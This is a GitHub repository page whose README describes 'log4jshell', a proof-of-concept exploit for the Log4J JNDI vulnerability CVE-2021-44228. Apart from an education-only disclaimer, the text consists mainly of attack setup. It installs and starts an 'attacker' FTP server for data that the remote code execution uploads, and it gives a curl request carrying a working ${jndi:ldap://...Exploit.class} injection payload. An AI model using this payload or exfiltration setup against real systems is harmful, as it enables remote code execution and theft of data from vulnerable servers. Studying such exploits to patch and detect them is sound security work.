Skip to content

Latest commit

 

History

8 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

log4jshell

log4jshell is an full fledged POC that exploit LOG4J vulnerability CVE-2021-44228 introduced as part of LOG4J2-313

NOTE : 

PLEASE USE THIS APP ONLY FOR EDUCATION PURPOSE.

THIS APP IS DEVELOPED AS A PROOF OF CONCEPT(POC) AND IS INTENTEDED ONLY FOR EDUCATION PURPOSE. 

USING THIS POC APP TO TARGET AGAINST ANY SYSTEMS WITHOUT CONSENT IS PURELY ILLEGAL.

ANY DAMAGES CAUSED DUE TO ILLEGAL USE OF THIS APP/SOFTWARE/POC IS NOT THE RESPONSIBILITY OF THE AUTHOR.

Log4JShell POC

Pre-requisites

Installation

Use the python package manager pip3 to install foobar.

pip3 install pyftpdlib

Create the FTP upload directory where the RCE will upload the information

mkdir -p /tmp/ftpuploads

Start the FTP Server locally

python3 src/main/python/attacker/ftp-server.py

Usage

curl --location --request GET 'http://localhost:8080/log4jshell/search' \
--header 'Content-Type: application/json' \
--data-raw '{
    "searchText" : "${jndi:ldap://localhost:8389/com.demo.exploit.log4jshell.attacker.payload.Exploit.class}"
}
'

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

Acknowledgments

Some of the references code that I have used to build this POC are listed below

About

log4jshell is an full fledged POC that exploit LOG4J vulnerability.

Resources

Stars

1 star

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages